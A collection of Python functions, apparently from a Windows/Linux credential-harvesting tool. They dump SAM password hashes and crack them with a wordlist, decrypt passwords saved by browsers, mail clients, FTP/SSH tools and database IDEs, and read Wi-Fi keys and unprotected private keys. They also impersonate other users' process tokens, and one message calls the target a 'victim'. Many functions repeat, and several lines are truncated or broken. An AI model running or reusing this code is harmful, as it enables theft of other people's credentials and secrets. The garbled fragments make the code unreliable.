def hashes_to_dic(self, title, format, content): Header().title1(title) print_debug('INFO', 'Format: (%s)' % format) items = sorted(content) pwdFound = [] values = {} all_hash = '\r\n' for item in items: hash = content[item] (uid, rid, lmhash, nthash) = hash.split(':')[:4] self.wordlist.append(uid.encode("utf8")) all_hash = '%s\r\n%s' % (all_hash, hash) password = self.bruteForce_Hash(nthash) # if a password has been found from the dictionary attack if password: accounts = {} accounts['Category'] = 'System account' accounts['user'] = uid accounts['password'] = password pwdFound.append(accounts) values['hashes'] = all_hash pwdFound.append(values) return pwdFound
def run(self): # print title Header().title_info('Dot Net Passport') a = self.get_creds() pwd = '' pwdFound = [] if a: for i in a: values = {} if i['Type'] == win32cred.CRED_TYPE_DOMAIN_VISIBLE_PASSWORD: cipher_text = i['CredentialBlob'] pwd = self.Win32CryptUnprotectData(cipher_text, self.get_entropy()) if pwd != 'failed': values['TargetName'] = i['TargetName'] if i['UserName'] is not None: values['Username'] = i['UserName'] try: values['Password'] = pwd.decode('utf16') except Exception,e: print_debug('DEBUG', '{0}'.format(e)) values['INFO'] = 'Error decoding the password' pwdFound.append(values) # print the results print_output('Dot Net Passport', pwdFound)
def get_creds(self): try: creds = win32cred.CredEnumerate(None, 0) return creds except Exception,e: print_debug('DEBUG', '{0}'.format(e)) return None
def impersonate_token(hToken): if not windll.Shell32.IsUserAnAdmin(): print_debug('ERROR', 'You need admin rights to run impersonate !') EnablePrivilege("SeDebugPrivilege") #hToken = getProcessToken(pid) hTokendupe = HANDLE( INVALID_HANDLE_VALUE ) SecurityImpersonation = 2 TokenPrimary = 1 if not windll.advapi32.DuplicateTokenEx( hToken, TOKEN_ALL_ACCESS, None, SecurityImpersonation, TokenPrimary, byref( hTokendupe ) ): WinError() windll.kernel32.CloseHandle(hToken) try: EnablePrivilege("SeAssignPrimaryTokenPrivilege", hToken = hTokendupe) except Exception as e: pass try: EnablePrivilege("SeIncreaseQuotaPrivilege", hToken = hTokendupe) except Exception as e: pass try: EnablePrivilege("SeImpersonatePrivilege") except Exception as e: pass if not windll.advapi32.ImpersonateLoggedOnUser(hTokendupe): return return hTokendupe
def start_proc_with_token(args, hTokendupe, hidden=True): ##Start the process with the token. lpProcessInformation = PROCESS_INFORMATION() lpStartupInfo = STARTUPINFO() if hidden: lpStartupInfo.dwFlags = subprocess.STARTF_USESHOWWINDOW|subprocess.CREATE_NEW_PROCESS_GROUP lpStartupInfo.wShowWindow = subprocess.SW_HIDE CREATE_NEW_CONSOLE = 0x00000010 CREATE_UNICODE_ENVIRONMENT = 0x00000400 NORMAL_PRIORITY_CLASS = 0x00000020 dwCreationflag = NORMAL_PRIORITY_CLASS | CREATE_UNICODE_ENVIRONMENT | CREATE_NEW_CONSOLE userenv = WinDLL('userenv', use_last_error=True) userenv.CreateEnvironmentBlock.argtypes = (POINTER(c_void_p), c_void_p, c_int) userenv.DestroyEnvironmentBlock.argtypes = (c_void_p,) cenv = c_void_p() success = userenv.CreateEnvironmentBlock(byref(cenv), hTokendupe, 0) if not success: return success = windll.advapi32.CreateProcessAsUserA(hTokendupe, None, ' '.join(args), None, None, True, dwCreationflag, cenv, None, byref(lpStartupInfo), byref(lpProcessInformation)) if not success: return print_debug('INFO', 'Process created PID: ' + str(lpProcessInformation.dwProcessId)) return lpProcessInformation.dwProcessId
def run(self): # Need admin privileges if not windll.Shell32.IsUserAnAdmin(): if logging.getLogger().isEnabledFor(logging.INFO) == True: Header().title('Windows Secrets') print_debug('WARNING', '[!] This script should be run as admin!') return # print the title Header().title('Windows Secrets') # if hives already exists if self.check_existing_systemFiles(): self.delete_existing_systemFiles() # delete it # save system hives for f in self.sysFile: subprocess.Popen('reg.exe save hklm\%s' % (f,f) , shell=True, stdout=subprocess.PIPE) if not self.check_existing_systemFiles(): print_debug('WARNING', 'Remove existing hive files and launch it again.') return retrieve_hash(self.address, '' % self.sysFile[2], '' % self.sysFile[1], '' % self.sysFile[0], self.ntds, self.history) # remove hives files self.delete_existing_systemFiles()
def ListSids(): sids=[] for proc in psutil.process_iter(): try: pinfo = proc.as_dict(attrs=['pid', 'username', 'name']) except psutil.NoSuchProcess: pass if pinfo['pid']<=4: continue if pinfo['username'] is None: continue try: hProcess = windll.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, int(pinfo['pid'])) hToken = HANDLE(INVALID_HANDLE_VALUE) windll.advapi32.OpenProcessToken(hProcess, tokenprivs, byref(hToken)) try: sids.append((pinfo['pid'], pinfo['name'], GetTokenSid(hToken), pinfo['username'])) except: pass windll.kernel32.CloseHandle(hToken) windll.kernel32.CloseHandle(hProcess) except Exception as e: print_debug('ERROR', str(e)) return list(sids)
def get_history(self): urls = [] urls = self.history_from_regedit() try: # wrapper to call the dll exported function (called list) lib = cdll.LoadLibrary(dll_name) lib.list.restype = POINTER(c_wchar_p) ret = lib.list() for r in ret: if r: if r.startswith("http") and r not in urls: urls.append(r) else: break # Unload the dll to delete it later handle = lib._handle # obtain the DLL handle windll.kernel32.FreeLibrary(handle) # delete the dll os.remove(dll_name) except: print_debug('ERROR', 'Browser history failed to load, only few url will be tried') pass urls.append('') urls.append('') urls.append('') urls.append('') return urls
def accountrc_decrypt(self, filename, key, mode=DES.MODE_CFB): """ Reads passwords from ClawsMail's accountrc file """ p = ConfigParser() pwdFound = [] for s in p.sections(): values = {} try: try: address = p.get(s, 'address') account = p.get(s, 'account_name') except: address = '<unknown>' account = '<unknown>' password = self.pass_decrypt(p.get(s, 'password'), key, mode=mode) # print('password for %s, %s is "%s"' % (account, address, password)) values = {'Account' : account, 'Address': address, 'Password': password} except Exception as e: print_debug('ERROR', 'Error resolving password for account "%s": %s' % (s, e)) # write credentials into a text file if len(values) != 0: pwdFound.append(values) return pwdFound
def extractSecretKey(self, globalSalt, masterPassword, entrySalt): (globalSalt, masterPassword, entrySalt) = self.is_masterpassword_correct(masterPassword) if unhexlify('f8000000000000000000000000000001') not in self.key3: return None privKeyEntry = self.key3[ unhexlify('f8000000000000000000000000000001') ] saltLen = ord( privKeyEntry[1] ) nameLen = ord( privKeyEntry[2] ) privKeyEntryASN1 = decoder.decode( privKeyEntry[3+saltLen+nameLen:] ) data = privKeyEntry[3+saltLen+nameLen:] self.printASN1(data, len(data), 0) #see entrySalt = privKeyEntryASN1[0][0][1][0].asOctets() privKeyData = privKeyEntryASN1[0][1].asOctets() privKey = self.decrypt3DES( globalSalt, masterPassword, entrySalt, privKeyData ) self.printASN1(privKey, len(privKey), 0) privKeyASN1 = decoder.decode( privKey ) prKey= privKeyASN1[0][2].asOctets() self.printASN1(prKey, len(prKey), 0) prKeyASN1 = decoder.decode( prKey ) id = prKeyASN1[0][1] key = long_to_bytes( prKeyASN1[0][3] ) print_debug('DEBUG', 'key: %s' % repr(key)) return key
def run(self): # print title Header().title_debug('SQL Developer') mainPath = self.get_mainPath() if mainPath == 'Error': print_debug('ERROR', 'The APPDATA environment variable is not defined.') elif mainPath == 'SQL_NOT_EXISTS': print_debug('INFO','SQL Developer not installed.') elif mainPath == 'SQL_NO_PASSWD': print_debug('INFO', 'No passwords found.') else: passphrase = self.get_passphrase(mainPath) if passphrase == 'Not_Found': print_debug('WARNING', 'The passphrase used to encrypt has not been found.') elif passphrase == 'xml_Not_Found': print_debug('WARNING', 'The xml file containing the passphrase has not been found.') else: salt = self.get_salt() self.get_infos(mainPath, passphrase, salt)
def decipher_new_version(self, path): database_path = path + os.sep + 'Login Data' if os.path.exists(database_path): # Connect to the Database conn = sqlite3.connect(database_path) cursor = conn.cursor() # Get the results try: cursor.execute('SELECT action_url, username_value, password_value FROM logins') except Exception,e: print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', 'Opera seems to be used, the database is locked. Kill the process and try again !') return pwdFound = [] for result in cursor.fetchall(): values = {} # Decrypt the Password password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1] if password: values['Site'] = result[0] values['Username'] = result[1] values['Password'] = password pwdFound.append(values) # print the results print_output("Opera", pwdFound)
def retrieve_password(self): # print the title Header().title_debug('Wifi (from Network Manager)') directory = '/etc/NetworkManager/system-connections' if os.path.exists(directory): if os.getuid() != 0: print_debug('INFO', 'You need more privileges (run it with sudo)\n') wireless_ssid = [ f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory,f))] pwdFound = [] for w in wireless_ssid: cp = RawConfigParser(), w)) values = {} values['SSID'] = w if cp.sections(): for section in cp.sections(): if 'wireless' in section: for i in cp.items(section): values[i[0]] = i[1] # write credentials into a text file if len(values) != 0: pwdFound.append(values) # print the results print_output('Wifi', pwdFound) else: print_debug('ERROR', 'the path "%s" does not exist' %(directory))
def run(self): # print title Header().title_debug('SQL Developer') mainPath = self.get_mainPath() if mainPath == 'Error': print_debug('ERROR', 'The APPDATA environment variable is not defined.') elif mainPath == 'SQL_NOT_EXISTS': print_debug('INFO', 'SQL Developer not installed.') elif mainPath == 'SQL_NO_PASSWD': print_debug('INFO', 'No passwords found.') else: passphrase = self.get_passphrase(mainPath) if passphrase == 'Not_Found': print_debug( 'WARNING', 'The passphrase used to encrypt has not been found.') elif passphrase == 'xml_Not_Found': print_debug( 'WARNING', 'The xml file containing the passphrase has not been found.' ) else: salt = self.get_salt() self.get_infos(mainPath, passphrase, salt)
def get_history(self): urls = [] urls = self.history_from_regedit() try: # wrapper to call the dll exported function (called list) lib = cdll.LoadLibrary(dll_name) lib.list.restype = POINTER(c_wchar_p) ret = lib.list() for r in ret: try: if r: if r.startswith("http") and r not in urls: urls.append(r) else: break except Exception, e: print_debug('DEBUG', '{0}'.format(e)) # Unload the dll to delete it later handle = lib._handle # obtain the DLL handle windll.kernel32.FreeLibrary(handle) # delete the dll os.remove(dll_name)
def extractSecretKey(self, globalSalt, masterPassword, entrySalt): (globalSalt, masterPassword, entrySalt) = self.is_masterpassword_correct(masterPassword) if unhexlify('f8000000000000000000000000000001') not in self.key3: return None privKeyEntry = self.key3[unhexlify('f8000000000000000000000000000001')] saltLen = ord(privKeyEntry[1]) nameLen = ord(privKeyEntry[2]) privKeyEntryASN1 = decoder.decode(privKeyEntry[3 + saltLen + nameLen:]) data = privKeyEntry[3 + saltLen + nameLen:] self.printASN1(data, len(data), 0) #see entrySalt = privKeyEntryASN1[0][0][1][0].asOctets() privKeyData = privKeyEntryASN1[0][1].asOctets() privKey = self.decrypt3DES(globalSalt, masterPassword, entrySalt, privKeyData) self.printASN1(privKey, len(privKey), 0) privKeyASN1 = decoder.decode(privKey) prKey = privKeyASN1[0][2].asOctets() self.printASN1(prKey, len(prKey), 0) prKeyASN1 = decoder.decode(prKey) id = prKeyASN1[0][1] key = long_to_bytes(prKeyASN1[0][3]) print_debug('DEBUG', 'key: %s' % repr(key)) return key
def get_key_info(self): accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE try: key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead) except Exception,e: print_debug('DEBUG', '{0}'.format(e)) return False
def get_logins_info(self): accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE try: key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0, accessRead) except Exception,e: print_debug('DEBUG', '{0}'.format(e)) return False
def get_history(self): urls = [] urls = self.history_from_regedit() try: # wrapper to call the dll exported function (called list) lib = cdll.LoadLibrary(dll_name) lib.list.restype = POINTER(c_wchar_p) ret = lib.list() for r in ret: try: if r: if r.startswith("http") and r not in urls: urls.append(r) else: break except Exception,e: print_debug('DEBUG', '{0}'.format(e)) # Unload the dll to delete it later handle = lib._handle # obtain the DLL handle windll.kernel32.FreeLibrary(handle) # delete the dll os.remove(dll_name)
def retrieve_password(self): # print the title Header().title_debug('Wifi (from Network Manager)') directory = '/etc/NetworkManager/system-connections' if os.path.exists(directory): if os.getuid() != 0: print_debug('INFO', 'You need more privileges (run it with sudo)\n') wireless_ssid = [ f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory,f))] pwdFound = [] for w in wireless_ssid: cp = RawConfigParser(), w)) values = {} values['SSID'] = w if cp.sections(): for section in cp.sections(): if 'wireless' in section: for i in cp.items(section): values[i[0]] = i[1] # write credentials into a text file if len(values) != 0: pwdFound.append(values) # print the results print_output('Wifi', pwdFound) else: print_debug('WARNING', 'the path "%s" does not exist' %(directory))
def run(self): # print title Header().title_info('Kalypso Media Launcher') creds = [] key = 'lwSDFSG34WE8znDSmvtwGSDF438nvtzVnt4IUv89' if 'APPDATA' in os.environ: inifile = os.environ['APPDATA'] + '\\Kalypso Media\\Launcher\\launcher.ini' else: print_debug('ERROR', 'The APPDATA environment variable is not defined.') return # The actual user details are stored in *.userdata files if not os.path.exists(inifile): print_debug('INFO', 'The Kalypso Media Launcher doesn\'t appear to be installed.') return config = ConfigParser.ConfigParser() values = {} values['Login'] = config.get('styx user','login') # get the encoded password cookedpw = base64.b64decode(config.get('styx user','password')); values['Password'] = self.xorstring(cookedpw, key) creds.append(values) print_output("Kalypso Media Launcher", creds)
class Chrome(ModuleInfo): def __init__(self): options = { 'command': '-c', 'action': 'store_true', 'dest': 'chrome', 'help': 'chrome' } ModuleInfo.__init__(self, 'chrome', 'browsers', options) # main function def run(self): # print title Header().title_info('Chrome') database_path = '' if 'HOMEDRIVE' in os.environ and 'HOMEPATH' in os.environ: # For Win7 path_Win7 = os.environ.get('HOMEDRIVE') + os.environ.get( 'HOMEPATH' ) + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data' # For XP path_XP = os.environ.get('HOMEDRIVE') + os.environ.get( 'HOMEPATH' ) + '\AppData\Local\Google\Chrome\User Data\Default\Login Data' if os.path.exists(path_XP): database_path = path_XP elif os.path.exists(path_Win7): database_path = path_Win7 else: print_debug('INFO', 'Google Chrome not installed.') return else: print_debug( 'ERROR', 'Environment variables (HOMEDRIVE or HOMEPATH) have not been found' ) return # Copy database before to query it (bypass lock errors) try: shutil.copy(database_path, os.getcwd() + os.sep + 'tmp_db') database_path = os.getcwd() + os.sep + 'tmp_db' except Exception, e: print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', 'An error occured copying the database file') # Connect to the Database try: conn = sqlite3.connect(database_path) cursor = conn.cursor() except Exception, e: print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', 'An error occured opening the database file') return
def retrieve_password(self): # print title Header().title_debug('Outlook') accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook' try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead) except: print_debug('WARNING', 'Outlook not installed.\nAn error occurs retrieving the registry key.\nKey = %s' % keyPath) return num = win32api.RegQueryInfoKey(hkey)[0] pwdFound = [] for x in range(0, num): name = win32api.RegEnumKey(hkey, x) skey = win32api.RegOpenKey(hkey, name, 0, accessRead) num_skey = win32api.RegQueryInfoKey(skey)[0] if num_skey != 0: for y in range(0, num_skey): name_skey = win32api.RegEnumKey(skey, y) sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead) num_sskey = win32api.RegQueryInfoKey(sskey)[1] for z in range(0, num_sskey): k = win32api.RegEnumValue(sskey, z) if 'password' in k[0].lower(): values = self.retrieve_info(sskey, name_skey) # write credentials into a text file if len(values) != 0: pwdFound.append(values) # print the results print_output("Outlook", pwdFound)
def extract_repositories_credentials(self): """ Extract all repositories's credentials. See :return: List of dict in which one dict contains all information for a repository. """ repos_creds = [] maven_settings_file_location = os.environ.get("USERPROFILE") + "\\.m2\\settings.xml" if os.path.isfile(maven_settings_file_location): try: settings = ET.parse(maven_settings_file_location).getroot() server_nodes = settings.findall(".//%sserver" % self.settings_namespace) for server_node in server_nodes: creds = {} for child_node in server_node: tag_name = child_node.tag.replace(self.settings_namespace, "") if tag_name in self.nodes_to_extract: creds[tag_name] = child_node.text.strip() if len(creds) > 0: repos_creds.append(creds) except Exception as e: print_debug("ERROR", "Cannot retrieve repositories credentials '%s'" % e) pass return repos_creds
def extract_private_keys_unprotected(self): """ Extract all DSA/RSA private keys that are not protected with a passphrase. :return: List of encoded key (key file content) """ keys = [] if isdir(self.key_files_location): for (dirpath, dirnames, filenames) in walk(self.key_files_location, followlinks=True): for f in filenames: key_file_path = join(dirpath, f) if isfile(key_file_path): try: # Read encoded content of the key with open(key_file_path, "r") as key_file: key_content_encoded = # Determine the type of the key (public/private) and what is it algorithm if "DSA PRIVATE KEY" in key_content_encoded: key_algorithm = "DSA" elif "RSA PRIVATE KEY" in key_content_encoded: key_algorithm = "RSA" else: key_algorithm = None # Check if the key can be loaded (used) without passphrase if key_algorithm is not None and self.is_private_key_unprotected(key_content_encoded, key_algorithm): keys.append(key_content_encoded) except Exception as e: print_debug("ERROR", "Cannot load key file '%s' '%s'" % (key_file_path, e)) pass return keys
def is_private_key_unprotected(self, key_content_encoded, key_algorithm): """ Check if the private key can be loaded without specifying any passphrase. PyCrypto >= 2.6.1 required in order to have the method importKey() in DSA class. :param key_content_encoded: Encoded content of the private key to test :param key_algorithm: Algorithm of the key (RSA or DSA) :return: True only if the key can be successfuly loaded and is usable """ state = False try: # Try to load it if key_algorithm == "RSA": key = RSA.importKey(key_content_encoded) else: key = DSA.importKey(key_content_encoded) # Validate loading state = (key is not None and key.can_sign() and key.has_private()) except Exception as e: print_debug("ERROR", "Cannot validate key protection '%s'" % e) state = False pass return state
def run(self, historic=''): # print title Header().title_debug('Internet Explorer') # write the binary file try: self.write_binary_file() except: print_debug('ERROR', '%s cannot be created, check your file permission' % dll_name) list = [] if historic: if os.path.exists(historic): f = open(historic, 'r') for line in f: list.append(line.strip()) else: print_debug('WARNING', 'The text file %s does not exist' % historic) # retrieve the urls from the history hash_tables = self.get_hash_table(list) # open the registry accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE keyPath = 'Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2' failed = False try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead) except: failed = True nb_site = 0 nb_pass_found = 0 if failed == False: num = win32api.RegQueryInfoKey(hkey)[1] for x in range(0, num): k = win32api.RegEnumValue(hkey, x) if k: nb_site +=1 for h in hash_tables: # both hash are similar, we can decipher the password if h[1] == k[0][:40].lower(): nb_pass_found += 1 cipher_text = k[1] self.decipher_password(cipher_text, h[0]) break # print the results print_output("Internet Explorer", pwdFound) # manage errors if nb_site == 0: print_debug('INFO', 'No credentials stored in the IE browser.') elif nb_site > nb_pass_found: print_debug('ERROR', '%s hashes have not been decrypted, the associate website used to decrypt the passwords has not been found' % str(nb_site - nb_pass_found)) else: print_debug('INFO', 'No password stored.\nThe registry key storing the ie password has not been found.\nKey: %s' % keyPath)
def check_winscp_installed(self): accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE try: key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Configuration\Security', 0, accessRead) return True except Exception,e: print_debug('DEBUG', '{0}'.format(e)) return False
def initialize_libnss(self, list_libnss, profile): for lib in list_libnss: try: self.libnss = CDLL(lib) if self.libnss.NSS_Init(profile) == 0: return True except Exception, e: print_debug('DEBUG', '{0}'.format(e))
def initialize_libnss(self, list_libnss, profile): for lib in list_libnss: try: self.libnss = CDLL(lib) if self.libnss.NSS_Init(profile) == 0: return True except Exception,e: print_debug('DEBUG', '{0}'.format(e))
def get_infos(self, path, passphrase, salt): for p in os.listdir(path): if p.startswith('o.jdeveloper.db.connection'): path += os.sep + p break xml_file = path + os.sep + 'connections.xml' if os.path.exists(xml_file): tree = ET.ElementTree(file=xml_file) pwdFound = [] values = {} for elem in tree.iter(): if 'addrType' in elem.attrib.keys(): if elem.attrib['addrType'] == 'sid': for e in elem.getchildren(): values['sid'] = e.text elif elem.attrib['addrType'] == 'port': for e in elem.getchildren(): values['port'] = e.text elif elem.attrib['addrType'] == 'user': for e in elem.getchildren(): values['user'] = e.text elif elem.attrib['addrType'] == 'ConnName': for e in elem.getchildren(): values['Connection Name'] = e.text elif elem.attrib['addrType'] == 'customUrl': for e in elem.getchildren(): values['custom Url'] = e.text elif elem.attrib['addrType'] == 'SavePassword': for e in elem.getchildren(): values['SavePassword'] = e.text elif elem.attrib['addrType'] == 'hostname': for e in elem.getchildren(): values['hostname'] = e.text elif elem.attrib['addrType'] == 'password': for e in elem.getchildren(): pwd = self.decrypt(salt, e.text, passphrase) values['password'] = pwd elif elem.attrib['addrType'] == 'driver': for e in elem.getchildren(): values['driver'] = e.text # password found pwdFound.append(values) # print the results print_output("SQL Developer", pwdFound) else: print_debug('ERROR', 'The xml file connections.xml containing the passwords has not been found.')
def parse_file(self): pwdFound = [] fd = None try: fd = open(self.filestr) except Exception, e: print_debug('DEBUG', '{0}'.format(e)) print_debug('INFO', 'Could not open the file: %s ' % self.filestr)
def retrieve_password(self): # print title Header().title_debug('FTP Navigator') path = "C:\\FTP Navigator\\Ftplist.txt" if os.path.exists(path): self.read_file(path) else: print_debug('INFO', 'Paht %s does not exist.\nFTP Navigator not installed or not found.' % path)
def get_logins_info(self): accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE try: key = win32api.RegOpenKey( win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0, accessRead) except Exception, e: print_debug('DEBUG', '{0}'.format(e)) return False
def retrieve_password(self): # print the title Header().title_debug('Jitsi') file_properties = self.get_path() if file_properties == 'JITSI_NOT_EXISTS': print_debug('INFO', 'Jitsi not installed.') else: self.get_info(file_properties)
def run(self): # print the title Header().title_info('Jitsi') file_properties = self.get_path() if file_properties == 'JITSI_NOT_EXISTS': print_debug('INFO', 'Jitsi not installed.') else: self.get_info(file_properties)
def run(self, historic=''): # print title Header().title_info('Internet Explorer') # write the binary file try: self.write_binary_file() except Exception,e: print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', '%s cannot be created, check your file permission' % dll_name)
def run(self): # print title Header().title_info('Puttycm') try: database_path = self.get_default_database() except Exception, e: print_debug('DEBUG', '{0}'.format(e)) print_debug('INFO', 'Puttycm not installed') return
def rev2self(): global global_ref windll.advapi32.RevertToSelf() try: if global_ref is not None: windll.kernel32.CloseHandle(global_ref) except: pass global_ref=None print_debug('INFO', 'Running as: ' + GetUserName())
def check_winscp_installed(self): accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE try: key = win32api.RegOpenKey( win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Configuration\Security', 0, accessRead) return True except Exception, e: print_debug('DEBUG', '{0}'.format(e)) return False
def run(self, historic=''): # print title Header().title_info('Internet Explorer') # write the binary file try: self.write_binary_file() except Exception, e: print_debug('DEBUG', '{0}'.format(e)) print_debug( 'ERROR', '%s cannot be created, check your file permission' % dll_name)
def readBsddb(self, name): f = open(name, 'rb') # header = * 15) magic = self.getLongBE(header, 0) if magic != 0x61561: print_debug('WARNING', 'Bad magic number') return False version = self.getLongBE(header, 4) if version != 2: print_debug('WARNING', 'Bad version !=2 (1.85)') return False pagesize = self.getLongBE(header, 12) nkeys = self.getLongBE(header, 0x38) readkeys = 0 page = 1 nval = 0 val = 1 db1 = [] while (readkeys < nkeys): * page) offsets = + 1) * 4 + 2) offsetVals = [] i = 0 nval = 0 val = 1 keys = 0 while nval != val: keys += 1 key = self.getShortLE(offsets, 2 + i) val = self.getShortLE(offsets, 4 + i) nval = self.getShortLE(offsets, 8 + i) offsetVals.append(key + pagesize * page) offsetVals.append(val + pagesize * page) readkeys += 1 i += 4 offsetVals.append(pagesize * (page + 1)) valKey = sorted(offsetVals) for i in range(keys * 2):[i]) data =[i + 1] - valKey[i]) db1.append(data) page += 1 f.close() db = {} for i in range(0, len(db1), 2): db[db1[i + 1]] = db1[i] return db
def run(self): Header().title_info('Wifi (from WPA Supplicant)') if self.check_file_access(): return # check root access if os.getuid() != 0: print_debug('INFO', 'You need more privileges (run it with sudo)\n') return pwdFound = self.parse_file() print_output("wpa_supplicant", pwdFound)
def history_from_regedit(self): urls = [] # open the registry accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE keyPath = 'Software\\Microsoft\\Internet Explorer\\TypedURLs' try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead) except Exception, e: print_debug('DEBUG', '{0}'.format(e)) return []
def get_path(self, software_name): if 'APPDATA' in os.environ: if software_name == 'Firefox': path = '%s\Mozilla\Firefox' % str(os.environ['APPDATA']) elif software_name == 'Thunderbird': path = '%s\Thunderbird' % str(os.environ['APPDATA']) else: print_debug( 'The APPDATA environment variable is not definded.\nUse the -s option and specify the folder path of the victim\nPath: <HOMEPATH>\Application Data\Mozilla\Firefox\Profiles\<PROFILE_NAME>' ) return return path
def get_hash_table(self, list): # get the url list urls = self.get_history() urls = urls + list # calculate the hash for all urls found on the history hash_tables = [] for u in range(len(urls)): try: h = (urls[u] + '\0').encode('UTF-16LE') hash_tables.append([h, hashlib.sha1(h).hexdigest().lower()]) except Exception, e: print_debug('DEBUG', '{0}'.format(e))
def get_dic_file(self, dictionary_path): words = [] if dictionary_path: try: dicFile = open (dictionary_path,'r') except Exception,e: print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', 'Unable to open passwords file: %s' % str(dictionary_path)) return [] for word in dicFile.readlines(): words.append(word.strip('\n')) dicFile.close()
def run(self): # print the title Header().title_debug('DbVisualizer') mainPath = self.get_mainPath() if mainPath == 'DBVIS_NOT_EXISTS': print_debug('INFO', 'DbVisualizer not installed.') else: passphrase = self.get_passphrase() salt = self.get_salt() self.get_infos(mainPath, passphrase, salt)
def run(self): # print title Header().title_info('Jitsi') file_properties = self.get_path() if file_properties == 'Error': print_debug('ERROR', 'The APPDATA environment variable is not defined') elif file_properties == 'JITSI_NOT_EXISTS': print_debug('INFO', 'Jitsi not installed.') else: self.get_info(file_properties)
def masterPasswordUsed(self, path): # the init file is not well defined so lines have to be removed before to parse it cp = RawConfigParser() f = open(path + os.sep + 'operaprefs.ini', 'rb') f.readline() # discard first line while 1: try: cp.readfp(f) break except Exception, e: print_debug('DEBUG', '{0}'.format(e)) f.readline() # discard first line